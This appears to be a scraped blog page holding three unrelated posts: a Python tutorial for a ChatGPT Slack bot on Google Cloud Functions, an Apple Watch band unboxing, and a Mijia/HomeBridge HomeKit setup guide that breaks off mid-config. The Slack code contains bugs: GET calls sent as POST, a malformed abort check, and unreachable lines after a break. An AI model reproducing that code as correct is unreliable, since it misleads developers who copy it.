+ # If it's a Slack App (OpenAI API Response), mark it as assistant
+ if appID and appID == apiAppID:
+ messages.append({
+ "role": "assistant", "content": threadMessageText
+ })
+ else:
+ # Mark the user's message content as user
+ messages.append({
+ "role": "user", "content": threadMessageText
+ })
+
+ messages.append({
+ "role": "user", "content": eventText
+ })
+
+ replyMessageTS = slackRequestPostMessage(eventChannel, eventTS, "Generating response...")
+ asyncio.run(openAIRequestAsync(eventChannel, replyMessageTS, messages))
+
+async def openAIRequestAsync(eventChannel, eventTS, messages):
+ client = AsyncOpenAI(
+ api_key=OPENAI_API_KEY,
+ )
+
+ # Stream Response
+ stream = await client.chat.completions.create(
+ model=OPENAI_MODEL,
+ messages=messages,
+ stream=True,
+ )
+
+ result = ""
+
+ try:
+ debounceSlackUpdateTime = None
+ async for chunk in stream:
+ result += chunk.choices[0].delta.content or ""
+
+ # Update the message every 0.8 seconds to avoid frequent calls to the Slack Update Message API, which may fail or waste Cloud Functions requests
+ if debounceSlackUpdateTime is None or time.time() - debounceSlackUpdateTime >= 0.8:
+ response = slackUpdateMessage(eventChannel, eventTS, None, result+"...")
+ debounceSlackUpdateTime = time.time()
+
+ # If the message has metadata & metadata event_type == aborted, it means the response has been marked as terminated by the user
+ if response and 'ok' in response and response['ok'] == True and 'message' in response and 'metadata' in response['message'] and 'event_type' in response['message']['metadata'] and response['message']['metadata']['event_type'] == "aborted":
+ break
+ result += "...*[Terminated]*"
+ # If the message has been deleted
+ elif response and 'ok' in response and response['ok'] == False and 'error' in response and response['error'] == "message_not_found":
+ break
+
+ await stream.close()
+
+ except Exception as e:
+ print(e)
+ result += "...*[Error occurred]*"
+
+ slackUpdateMessage(eventChannel, eventTS, None, result)
+
+
+### Slack ###
+def slackGetReplies(channel, ts):
+ endpoint = "/conversations.replies?channel="+channel+"&ts="+ts
+ response = slackRequest(endpoint, "GET", None)
+
+ if response is not None and 'messages' in response:
+ return response['messages']
+ return None
+
+def slackOpenModal(trigger_id, callback_id, text):
+ slackRequest("/views.open", "POST", {
+ "trigger_id": trigger_id,
+ "view": {
+ "type": "modal",
+ "callback_id": callback_id,
+ "title": {
+ "type": "plain_text",
+ "text": "Prompt"
+ },
+ "blocks": [
+ {
+ "type": "section",
+ "text": {
+ "type": "mrkdwn",
+ "text": text
+ }
+ }
+ ]
+ }
+ })
+
+def slackUpdateMessage(channel, ts, metadata, text):
+ endpoint = "/chat.update"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+ if metadata is not None:
+ payload['metadata'] = metadata
+
+ payload['text'] = text
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
+def slackRequestPostMessage(channel, target_ts, text):
+ endpoint = "/chat.postMessage"
+ payload = {
+ "channel": channel,
+ "text": text,
+ }
+ if target_ts is not None:
+ payload['thread_ts'] = target_ts
+
+ response = slackRequest(endpoint, "POST", payload)
+
+ if response is not None and 'ts' in response:
+ return response['ts']
+ return None
+
+def slackRequest(endpoint, method, payload):
+ url = "https://slack.com/api"+endpoint
+
+ headers = {
+ "Authorization": f"Bearer {SLACK_BOT_TOKEN}",
+ "Content-Type": "application/json",
+ }
+
+ response = None
+ if method == "POST":
+ response = requests.post(url, headers=headers, data=json.dumps(payload))
+ elif method == "GET":
+ response = requests.post(url, headers=headers)
+
+ if response and response.status_code == 200:
+ result = response.json()
+ return result
+ else:
+ return None
+
Back to Slack to test:
At this point, we have built a ChatGPT (via OpenAI API) Slack App Bot.
You can also refer to Slack API and OpenAI API Custom instructions to integrate them into Cloud Functions Python programs according to your needs. For example, training a channel to answer team questions and find project documents, a channel dedicated to translation, a channel dedicated to data analysis, etc.
First, you need to add the app_mention
Event Subscription:
After adding, click “Save Changes” to save, then “reinstall your app” to complete.
In the main.py
program mentioned above, in the #Handle Event Subscriptions Events…
Code Block, add a new Event Type judgment:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+
# Mention Event (@SlackApp hello)
+ if eventType == 'app_mention':
+ # Event message sender
+ eventUser = request_json['event']['user']
+ # Event message channel
+ eventChannel = request_json['event']['channel']
+ # Event message content, remove the leading tag string <@SLACKAPPID>
+ eventText = re.sub(r"<@\w+>\W*", "", request_json['event']['text'])
+ # Event message TS (message ID)
+ eventTS = request_json['event']['event_ts']
+
+ # Parent message TS of the event message thread (message ID)
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
After deployment, it will be completed.
You cannot directly delete messages sent by Slack App on Slack. You can refer to the above “ Stop OpenAI API Response
“ Shortcut method, and add a “delete message” Shortcut.
And in the Cloud Functions main.py
program:
In the # Handle Shortcut Code Block
, add a callback_id judgment. If it equals the “delete message” Shortcut Callback ID you defined, pass the parameters into the following method to delete:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
def slackDeleteMessage(channel, ts):
+ endpoint = "/chat.delete"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
SAFE_ACCESS_TOKEN = "nF4JwxfG9abqPZCJnBerwwhtodC28BuC"
+
+@functions_framework.http
+def hello_http(request):
+ request_json = request.get_json(silent=True)
+ request_args = request.args
+ request_headers = request.headers
+ # Verify if the token parameter is valid
+ if not(request_args and 'token' in request_args and request_args['token'] == SAFE_ACCESS_TOKEN):
+ return ('', 400, headers)
+
Different regions, CPU, RAM, capacity, traffic… have different prices. Please refer to the official pricing table.
The free tier is as follows: (2024/02/15)
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
Cloud Functions offers a permanent free tier for compute time resources,
+including allocations of GB-seconds and GHz-seconds. In addition to 2 million invocations,
+this free tier also provides 400,000 GB-seconds and 200,000 GHz-seconds of compute time,
+and 5 GB of internet data transfer per month.
+
+The usage quota of the free tier is calculated in equivalent USD amounts at the above tier 1 prices.
+Regardless of whether the function execution region uses tier 1 and/or tier 2 prices, the system will allocate the equivalent USD amount to you.
+However, when deducting the free tier quota, the system will use the tier (tier 1 or tier 2) of the function execution region as the standard.
+
+Please note that even if you are using the free tier, you must have a valid billing account.
+
btw. Slack App is free, you don’t necessarily need Premium to use it.
(Excluding the issue of slow response during OpenAI API peak times), if it’s a Cloud Function bottleneck, you can expand the settings on the first page of the Cloud Function editor:
You can adjust CPU, RAM, Timeout time, Concurrent number… to improve request processing speed.
*But it may incur additional costs
Click “Test Function” to open a Cloud Shell window in the bottom toolbar. Wait about 3–5 minutes (the first startup takes longer), and after the build is completed and the following authorization is agreed upon:
Once you see “Function is ready to test,” you can click “Run Test” to execute the method for debugging.
You can use the “Triggering event” block on the right to input a JSON Body that will be passed into the request_json
parameter for testing, or directly modify the program to inject a test object for testing.
*Please note that Cloud Shell/Cloud Run may incur additional costs.
It is recommended to run a test before deploying (Deploy) to ensure that the build can succeed.
If you accidentally write incorrect code causing Cloud Function Deploy Build Failed, an error message will appear. At this point, clicking “EDIT AND REDEPLOY” to return to the editor will find that the code you just changed is gone!!!
No need to worry, at this point, click “Source Code” on the left and select “Last Failed Deployment” to restore the code that just Build Failed:
print
Logs*Please note that Cloud Logging and Querying Logs may incur additional costs.
main.py
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+161
+162
+163
+164
+165
+166
+167
+168
+169
+170
+171
+172
+173
+174
+175
+176
+177
+178
+179
+180
+181
+182
+183
+184
+185
+186
+187
+188
+189
+190
+191
+192
+193
+194
+195
+196
+197
+198
+199
+200
+201
+202
+203
+204
+205
+206
+207
+208
+209
+210
+211
+212
+213
+214
+215
+216
+217
+218
+219
+220
+221
+222
+223
+224
+225
+226
+227
+228
+229
+230
+231
+232
+233
+234
+235
+236
+237
+238
+239
+240
+241
+242
+243
+244
+245
+246
+247
+248
+249
+250
+251
+252
+253
+254
+255
+256
+257
+258
+259
+260
+261
+262
+263
+264
+265
+266
+267
+268
+269
+270
+271
+272
+273
+274
+275
+276
+277
+278
+279
+280
+281
+282
+283
+284
+285
+286
+287
+288
+289
+290
+291
+292
+293
+294
+295
+296
+297
+298
+299
+300
+301
+302
+303
+304
+305
+306
+307
+308
+309
+310
+311
+312
+313
+314
+315
+316
+317
+318
+319
+320
+321
+322
+323
+324
+325
+326
+327
+328
+329
+330
+331
+332
+
import functions_framework
+import requests
+import re
+import asyncio
+import json
+import time
+from openai import AsyncOpenAI
+
+OPENAI_API_KEY = "OPENAI API KEY"
+SLACK_BOT_TOKEN = "Bot User OAuth Token"
+
+# Custom defined security verification Token
+# The URL must carry the ?token=SAFE_ACCESS_TOKEN parameter to accept the request
+SAFE_ACCESS_TOKEN = "nF4JwxfG9abqPZCJnBerwwhtodC28BuC"
+
+# The OPENAI API Model used
+# https://platform.openai.com/docs/models
+OPENAI_MODEL = "gpt-4-1106-preview"
+
+@functions_framework.http
+def hello_http(request):
+ request_json = request.get_json(silent=True)
+ request_args = request.args
+ request_headers = request.headers
+
+ # Shortcut events will be given from the post payload field
+ # https://api.slack.com/reference/interaction-payloads/shortcuts
+ payload = request.form.get('payload')
+ if payload is not None:
+ payload = json.loads(payload)
+
+ # You can simply use print to record runtime logs, which can be viewed in Logs
+ # For advanced Logging Level usage, refer to: https://cloud.google.com/logging/docs/reference/libraries
+ # print(payload)
+
+ # Due to the nature of FAAS (Cloud Functions), if the service is not called for a long time, it will enter a cold start when called again, which may not respond within Slack's 3-second limit
+ # Additionally, it takes a certain amount of time for the OpenAI API to respond (depending on the response length, it may take up to 1 minute to complete)
+ # If Slack does not receive a response within the time limit, it will consider the request lost and will call again
+ # This will cause repeated requests and responses, so we can set X-Slack-No-Retry: 1 in the Response Headers to inform Slack that even if it does not receive a response within the time limit, it does not need to retry
+ headers = {'X-Slack-No-Retry':1}
+
+ # Verify if the token parameter is valid
+ if not(request_args and 'token' in request_args and request_args['token'] == SAFE_ACCESS_TOKEN):
+ return ('', 400, headers)
+
+ # If it is a Slack Retry request...ignore
+ if request_headers and 'X-Slack-Retry-Num' in request_headers:
+ return ('OK!', 200, headers)
+
+ # Slack App Event Subscriptions Verify
+ # https://api.slack.com/events/url_verification
+ if request_json and 'type' in request_json and request_json['type'] == 'url_verification':
+ challenge = ""
+ if 'challenge' in request_json:
+ challenge = request_json['challenge']
+ return (challenge, 200, headers)
+
+ # Handle Event Subscriptions Events...
+ if request_json and 'event' in request_json and 'type' in request_json['event']:
+ apiAppID = None
+ if 'api_app_id' in request_json:
+ apiAppID = request_json['api_app_id']
+ # If the event source is the App and the App ID == Slack App ID, it means the event was triggered by its own Slack App
+ # Ignore and do not process, otherwise it will fall into an infinite loop Slack App -> Cloud Functions -> Slack App -> Cloud Functions...
+ if 'app_id' in request_json['event'] and apiAppID == request_json['event']['app_id']:
+ return ('OK!', 200, headers)
+
+ # Event name, for example: message (related to messages), app_mention (mentioned)....
+ eventType = request_json['event']['type']
+
+ # SubType, for example: message_changed (edited message), message_deleted (deleted message)...
+ # New messages do not have a Sub Type
+ eventSubType = None
+ if 'subtype' in request_json['event']:
+ eventSubType = request_json['event']['subtype']
+
+ # Message type Event
+ if eventType == 'message':
+ # Messages with Sub Type are edited, deleted, replied to...
+ # Ignore and do not process
+ if eventSubType is not None:
+ return ("OK!", 200, headers)
+
+ # Event message sender
+ eventUser = request_json['event']['user']
+ # Event message channel
+ eventChannel = request_json['event']['channel']
+ # Event message content
+ eventText = request_json['event']['text']
+ # Event message TS (message ID)
+ eventTS = request_json['event']['event_ts']
+
+ # Event message thread parent message TS (message ID)
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
+ # Mention type Event (@SlackApp hello)
+ if eventType == 'app_mention':
+ # Event message sender
+ eventUser = request_json['event']['user']
+ # Event message channel
+ eventChannel = request_json['event']['channel']
+ # Event message content, remove the leading tag string <@SLACKAPPID>
+ eventText = re.sub(r"<@\w+>\W*", "", request_json['event']['text'])
+ # Event message TS (message ID)
+ eventTS = request_json['event']['event_ts']
+
+ # Event message thread parent message TS (message ID)
+ # Only new messages in the thread will have this data
+ eventThreadTS = None
+ if 'thread_ts' in request_json['event']:
+ eventThreadTS = request_json['event']['thread_ts']
+
+ openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText)
+ return ("OK!", 200, headers)
+
+
+ # Handle Shortcut (message)
+ if payload and 'type' in payload:
+ payloadType = payload['type']
+
+ # If it is a message Shortcut
+ if payloadType == 'message_action':
+ callbackID = None
+ channel = None
+ ts = None
+ text = None
+ triggerID = None
+
+ if 'callback_id' in payload:
+ callbackID = payload['callback_id']
+ if 'channel' in payload:
+ channel = payload['channel']['id']
+ if 'message' in payload:
+ ts = payload['message']['ts']
+ text = payload['message']['text']
+ if 'trigger_id' in payload:
+ triggerID = payload['trigger_id']
+
+ if channel is not None and ts is not None and text is not None:
+ # If it is a stop OpenAI API response Shortcut
+ if callbackID == "abort_openai_api":
+ slackUpdateMessage(channel, ts, {"event_type": "aborted", "event_payload": { }}, text)
+ if triggerID is not None:
+ slackOpenModal(triggerID, callbackID, "Successfully stopped OpenAI API response!")
+ return ("OK!", 200, headers)
+ # If it is a delete message
+ if callbackID == "delete_message":
+ slackDeleteMessage(channel, ts)
+ if triggerID is not None:
+ slackOpenModal(triggerID, callbackID, "Successfully deleted Slack App message!")
+ return ("OK!", 200, headers)
+
+ return ("Access Denied!", 400, headers)
+
+def openAIRequest(apiAppID, eventChannel, eventTS, eventThreadTS, eventText):
+
+ # Set Custom instructions
+ # Thanks to a colleague (https://twitter.com/je_suis_marku) for support
+ messages = [
+ {"role": "system", "content": "I can only understand Traditional Chinese and English"},
+ {"role": "system", "content": "I do not understand Simplified Chinese"},
+ {"role": "system", "content": "If I speak Chinese, I will respond in Traditional Chinese, and it must conform to common Taiwanese usage."},
+ {"role": "system", "content": "If I speak English, I will respond in English."},
+ {"role": "system", "content": "Do not respond with pleasantries."},
+ {"role": "system", "content": "There should be a space between Chinese and English. There should be a space between Chinese characters and any other language characters, including numbers and emojis."},
+ {"role": "system", "content": "If you don't know the answer, or if your knowledge is outdated, please search online before answering."},
+ {"role": "system", "content": "I will tip you 200 USD, if you answer well."}
+ ]
+
+ if eventThreadTS is not None:
+ threadMessages = slackGetReplies(eventChannel, eventThreadTS)
+ if threadMessages is not None:
+ for threadMessage in threadMessages:
+ appID = None
+ if 'app_id' in threadMessage:
+ appID = threadMessage['app_id']
+ threadMessageText = threadMessage['text']
+ threadMessageTs = threadMessage['ts']
+ # If it is a Slack App (OpenAI API Response), mark it as assistant
+ if appID and appID == apiAppID:
+ messages.append({
+ "role": "assistant", "content": threadMessageText
+ })
+ else:
+ # User's message content marked as user
+ messages.append({
+ "role": "user", "content": threadMessageText
+ })
+
+ messages.append({
+ "role": "user", "content": eventText
+ })
+
+ replyMessageTS = slackRequestPostMessage(eventChannel, eventTS, "Generating response...")
+ asyncio.run(openAIRequestAsync(eventChannel, replyMessageTS, messages))
+
+async def openAIRequestAsync(eventChannel, eventTS, messages):
+ client = AsyncOpenAI(
+ api_key=OPENAI_API_KEY,
+ )
+
+ # Stream Response
+ stream = await client.chat.completions.create(
+ model=OPENAI_MODEL,
+ messages=messages,
+ stream=True,
+ )
+
+ result = ""
+
+ try:
+ debounceSlackUpdateTime = None
+ async for chunk in stream:
+ result += chunk.choices[0].delta.content or ""
+
+ # Update the message every 0.8 seconds to avoid frequent calls to the Slack Update Message API, which may cause failures or waste Cloud Functions request counts
+ if debounceSlackUpdateTime is None or time.time() - debounceSlackUpdateTime >= 0.8:
+ response = slackUpdateMessage(eventChannel, eventTS, None, result+"...")
+ debounceSlackUpdateTime = time.time()
+
+ # If the message has metadata & metadata event_type == aborted, it means this response has been marked as terminated by the user
+ if response and 'ok' in response and response['ok'] == True and 'message' in response and 'metadata' in response['message'] and 'event_type' in response['message']['metadata'] == "aborted":
+ break
+ result += "...*[Terminated]*"
+ # The message has been deleted
+ elif response and 'ok' in response and response['ok'] == False and 'error' in response and response['error'] == "message_not_found":
+ break
+
+ await stream.close()
+
+ except Exception as e:
+ print(e)
+ result += "...*[Error occurred]*"
+
+ slackUpdateMessage(eventChannel, eventTS, None, result)
+
+
+### Slack ###
+def slackGetReplies(channel, ts):
+ endpoint = "/conversations.replies?channel="+channel+"&ts="+ts
+ response = slackRequest(endpoint, "GET", None)
+
+ if response is not None and 'messages' in response:
+ return response['messages']
+ return None
+
+def slackOpenModal(trigger_id, callback_id, text):
+ slackRequest("/views.open", "POST", {
+ "trigger_id": trigger_id,
+ "view": {
+ "type": "modal",
+ "callback_id": callback_id,
+ "title": {
+ "type": "plain_text",
+ "text": "Prompt"
+ },
+ "blocks": [
+ {
+ "type": "section",
+ "text": {
+ "type": "mrkdwn",
+ "text": text
+ }
+ }
+ ]
+ }
+ })
+
+def slackDeleteMessage(channel, ts):
+ endpoint = "/chat.delete"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
+def slackUpdateMessage(channel, ts, metadata, text):
+ endpoint = "/chat.update"
+ payload = {
+ "channel": channel,
+ "ts": ts
+ }
+ if metadata is not None:
+ payload['metadata'] = metadata
+
+ payload['text'] = text
+
+ response = slackRequest(endpoint, "POST", payload)
+ return response
+
+def slackRequestPostMessage(channel, target_ts, text):
+ endpoint = "/chat.postMessage"
+ payload = {
+ "channel": channel,
+ "text": text,
+ }
+ if target_ts is not None:
+ payload['thread_ts'] = target_ts
+
+ response = slackRequest(endpoint, "POST", payload)
+
+ if response is not None and 'ts' in response:
+ return response['ts']
+ return None
+
+def slackRequest(endpoint, method, payload):
+ url = "https://slack.com/api"+endpoint
+
+ headers = {
+ "Authorization": f"Bearer {SLACK_BOT_TOKEN}",
+ "Content-Type": "application/json",
+ }
+
+ response = None
+ if method == "POST":
+ response = requests.post(url, headers=headers, data=json.dumps(payload))
+ elif method == "GET":
+ response = requests.post(url, headers=headers)
+
+ if response and response.status_code == 200:
+ result = response.json()
+ return result
+ else:
+ return None
+
requirements.txt
:
1
+2
+3
+
functions-framework==3.*
+requests==2.31.0
+openai==1.9.0
+
OAuth & Permissions
Interactivity & Shortcuts
https://us-central1-xxx-xxx.cloudfunctions.net/SlackBot-Rick-C-137?token=nF4JwxfG9abqPZCJnBerwwhtodC28BuC
Interactivity & Shortcuts
https://us-central1-xxx-xxx.cloudfunctions.net/SlackBot-Rick-C-137?token=nF4JwxfG9abqPZCJnBerwwhtodC28BuC
App Home
Basic Information
Rick & Morty 🤘🤘🤘
If you and your team have automation tool and process integration needs, whether it’s Slack App development, Notion, Asana, Google Sheet, Google Form, GA data, various integration needs, feel free to contact for development.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Apple Original Stainless Steel 44mm Graphite Milanese Loop Unboxing
Following the previous post “Apple Watch Series 6 Unboxing & Two Years Usage Review”, I finally decided to get the original Milanese loop. I had wanted to buy it two years ago but never did; this time, I decided to update everything at once. Apple guarantees that the bands are compatible with all subsequent Apple Watch versions, so there’s no worry about the band not fitting future updates.
The Milanese loop is made of stainless steel mesh and a magnetic clasp. The benefits of the stainless steel mesh are breathability and quick drying; the magnetic clasp allows the band to be adjusted to any position, fits the wrist better, is easy to wear, and has strong magnetism, so it won’t fall off. Most importantly, it makes the Apple Watch look more formal and easier to match with outfits.
It pulls hair, pulls hair, pulls hair, and is relatively heavy.
Having been in Apple communities for a while, I’ve noticed that the most frequently asked question is about the original vs. third-party Milanese loop. Personally, I think the difference is not significant, mainly in the details and craftsmanship. The original also pulls hair, but the original’s weaving is very delicate and integrated, the magnetic part is very strong and won’t loosen, and it’s clean and skin-friendly without a rusty smell. However, the price difference is several times (the original costs $3,100). It’s best to touch the actual product before deciding. I guess third-party Milanese loops costing 1-2 thousand should almost equal the original in craftsmanship.
As mentioned in the previous post, it’s recommended for those with smaller wrists to buy the Apple Watch 40mm, as the 40mm Milanese loop fits wrists 130–180mm, compared to the 44mm Milanese loop, which fits wrists 150–200mm, 20mm shorter.
The band is one-piece and cannot be adjusted in length; if the band is already tight but still too big, you can only consider third-party options, or gain some weight (?). So it’s safer to try it on in-store.
A friend’s case, wrist too small, bought 44 + Milanese loop, can only stick to the end and still a bit loose!
* Purchased on 2020/11/01 at Apple Store 101 flagship store.
Same simple paper packaging
Back of the packaging
Now it’s not called Space Gray, but Graphite.
Contents
Similar to the original silicone band, but the difference is that it doesn’t come with an extra short band XD
The band itself
Magnetic clasp
Magnetic clasp, can attach at any position, adjust the loop size freely
Installation instructions
The side with the magnet goes down and is buckled into the Apple Watch body.
Don’t be like me and install it backwards at first without realizing it, although it doesn’t really matter? :
Correct version! Done!
Wearing picture - back
Wearing picture - front
*Simple way to distinguish between original and aftermarket Milanese straps, but not necessarily accurate; purchasing through legitimate channels ensures you won’t be scammed!
Connection end - the end near the magnetic clasp — bottom — has “Assembled in China” text
Connection end other end — surface — has “44MM” text
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Mijia Smart Camera and Mijia Smart Desk Lamp, Homekit Setup Tutorial
[2020/04/20] Advanced Tutorial Released : Experienced users please proceed directly to the advanced tutorial>> Demonstration of using Raspberry Pi as HomeBridge host to connect all Mijia appliances to HomeKit
I recently moved; unlike my previous place where the ceiling had office-style light fixtures that were too bright, the new place has decorative reflective lights that are a bit dim for using the computer or reading. After two weeks, my eyes felt more dry and uncomfortable. Initially, I planned to shop at IKEA, but considering the light color and eye protection, I ultimately chose Xiaomi desk lamps (since I already had a Xiaomi smart camera, all part of the Mijia series).
I didn’t particularly check if the products supported Apple HomeKit when purchasing, which is quite a failure as an iOS developer because I didn’t expect Xiaomi to support it.
So, this article will separately introduce Apple HomeKit usage, how to use third-party connections for smart home devices that do not support Apple HomeKit, and how to set up a smart home using Mijia itself (with IFTTT).
You can skip to the sections that suit your device needs.
I bought two desk lamps, one (Pro) for the computer desk and the other for the bedside as a reading lamp.
NT$ 1,795 supports Mijia, Apple HomeKit
NT$ 995 only supports Mijia
For detailed introductions, refer to the official website. Both lamps support smart control, color change, brightness adjustment, and eye protection. The Pro version supports Apple HomeKit and three-angle adjustments. So far, I am quite satisfied with the functionality of one lamp. If I had to pick a flaw, it would be that the Pro version’s angle adjustment only allows the base to rotate horizontally, not the lamp itself, which means you can’t adjust the light angle!
When returning home: Automatically turn off the camera (for privacy and to prevent false alarms, as the Mijia app has a bug where the home security alarm cannot be turned on/off according to the set time), and turn on the Pro lamp on the computer desk (to avoid fumbling in the dark). When leaving home: Automatically turn on the camera (default to home security mode) and turn off all lights.
Receive push notifications when leaving or returning home, and trigger operations with a single tap on the phone (with the current devices, it’s not possible to achieve the ideal automation goal).
*Only for Mijia Desk Lamp Pro! Mijia Desk Lamp Pro! Mijia Desk Lamp Pro!
This is the simplest part because it’s all native functionality.
Only four steps
After successfully adding the accessory, press hard (3D TOUCH) / long press on the accessory to adjust the brightness and color.
Apart from the smart devices that support Apple HomeKit, does it mean that devices that do not support Apple HomeKit cannot be controlled through the Home app at all? This section will guide you step-by-step on how to add unsupported devices (cameras, regular desk lamps) to the “Home” app!
Mac ONLY, Windows users please skip to the section on using Mi Home
My device is MacOS 10.14/iOS 12
Using HomeBridge:
HomeBridge uses a Mac computer as a bridge to simulate unsupported devices as HomeKit devices, allowing them to be added to the “Home” accessories.
Operation Comparison
One key point is that you need to keep a Mac computer on to maintain the bridge channel smoothly; once the computer is turned off or goes to sleep, you will not be able to control those HomeKit devices.
Of course, there are also advanced methods online where people buy a Raspberry Pi to use as a bridge; however, this involves too much technical detail and will not be covered in this article.
If you are aware of the drawbacks and still want to try, you can continue reading or skip to the next section on using Mi Home directly.
Step 1:
Install node.js: Click here to download and install it.
Step 2:
Open “Terminal” and enter
1
+
sudo npm -v
+
Check if the node.js npm package manager is installed successfully: if the version number is displayed, it means success!
Step 3:
Install the HomeBridge package via npm:
1
+
sudo npm -g install homebridge --unsafe-perm
+
After the installation is complete… the HomeBridge tool is installed!
As mentioned earlier, “HomeBridge uses a Mac computer as a bridge to simulate unsupported devices as HomeKit devices,” HomeBridge is just a platform, and each device needs to find additional HomeBridge plugin resources to be added.
It’s easy to find, just google or search on GitHub for “Mi Home product English name homebridge” and you will find many resources; here are two resources for devices I use:
1. Mi Home Camera Pan-Tilt Version Resource: MijiaCamera
Cameras are relatively tricky devices, and I spent some time researching and organizing this; I hope it helps those in need!
First, use “Terminal” to install the MijiaCamera npm package with the command
1
+
sudo npm install -g homebridge-mijia-camera
+
After installation, we need to obtain the camera’s network IP address and Token information.
Open the Mi Home APP → Camera → Top right corner “…” → Settings → Network Information to get the IP address!
Token information is more troublesome and requires you to connect your phone to the Mac:
Open iTunes Interface
Select backup Do not check Encrypt local backup, and click “Back Up Now.”
After the backup is complete, download and install the backup viewing software: iBackupViewer
Open “iBackupViewer”. The first time you launch it, you will need to go to Mac “System Preferences” -> “Security & Privacy” -> “Privacy” -> “+” -> Add “iBackupViewer”. *If you have privacy concerns, you can disable the network while using this software and remove it after use.
Open “iBackupViewer” again. After successfully reading the backup file, click the top right corner to switch to “Tree View” mode.
On the left side, you will see all the installed apps. Find the Mi Home app “AppDomain-com.xiaomi.mihome” -> “Documents”.
In the document list on the right, find and select the file “number_mihome.sqlite”.
Click the top right corner “Export” -> “Selected”.
Drop the exported sqlite file into https://inloop.github.io/sqlite-viewer/ to view the content.
You can see all the device information fields on the Mi Home app. Scroll to the far right end to find the ZTOKEN field. Double-click to edit, select all, and copy.
Finally, open http://aes.online-domain-tools.com/ to convert ZTOKEN into the final Token.
Token: I tried using “miio” to sniff directly, but it seems that the Mi Home camera firmware has been updated, and this method no longer works to quickly and conveniently obtain the Token!
Back to HomeBridge! Edit the config file config.json
Use “Finder” -> “Go” -> “Go to Folder” -> Enter “~/ .homebridge” to go.
Open “config.json” with a text editor. If this file does not exist, create one yourself or click here to download and place it directly.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "accessories":[
+ {
+ "accessory":"MijiaCamera",
+ "name":"Mi Camera",
+ "ip":"",
+ "token":""
+ }
+ ]
+}
+
Add the above content to config.json, and input the IP and Token obtained earlier.
Then, go back to the “Terminal” and enter the following command to start HomeBridge:
1
+
sudo homebridge start
+
If you have already started it and then changed the config.json content, you can use:
1
+
sudo homebridge restart
+
Restart
At this point, a HomeKit QRCode will appear for you to scan and add accessories (steps as mentioned above, the way to add Apple HomeKit devices).
Below will also have status messages: [2019–7–4 23:45:03] [Mi Camera] connecting to camera at 192.168.0.100… [2019–7–4 23:45:03] [Mi Camera] current power state: off
If you see these and no error messages appear, it means the setup is successful!
The most common error is usually an incorrect Token. Just check if there are any omissions in the above process.
Now you can turn the Mi Home Smart Camera on and off from the “Home” APP!
2. Mi Home LED Smart Desk Lamp HomeBridge Resource: homebridge-yeelight-wifi
Next is the Mi Home LED Smart Desk Lamp. Since it does not support Apple HomeKit like the Pro version, we still need to use the HomeBridge method to add it. Although the steps do not require a cumbersome process to obtain IP and Token, it is relatively simpler than the camera, but the desk lamp has its own pitfalls. You need to use another YeeLight APP to pair it and then turn on the local network control setting:
I have to complain about this poor integration; the native Mi Home APP cannot make this setting. So please search for the “ Yeelight “ APP in the APP Store to download and install it.
Open the APP -> Log in directly using the Mi Home account -> Add device -> Mi Home Desk Lamp -> Follow the instructions to rebind the desk lamp to the Yeelight APP.
After the device is bound, go back to the “Device” page -> Click “Mi Home Desk Lamp” to enter -> Click the bottom right “△” Tab -> Click “Local Network Control” to enter the settings -> Turn on the button to allow local network control.
The desk lamp setup is complete here. You can keep this APP to control the desk lamp or rebind it back to Mi Home.
Next is the HomeBridge setup; similarly, open the “Terminal” and enter the command to install the homebridge-yeelight-wifi npm package
1
+
sudo npm install -g homebridge-yeelight-wifi
+
After installation, follow the same steps as the camera, go to the ~/.homebridge folder, create or edit the config.json file, and this time just add the following inside the last }:
1
+2
+3
+4
+5
+6
+
"platforms": [
+ {
+ "platform" : "yeelight",
+ "name" : "yeelight"
+ }
+ ]
+
That’s it!
Finally, combine the above camera config.json file as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+
{
+ "bridge": {
+ "name": "Homebridge",
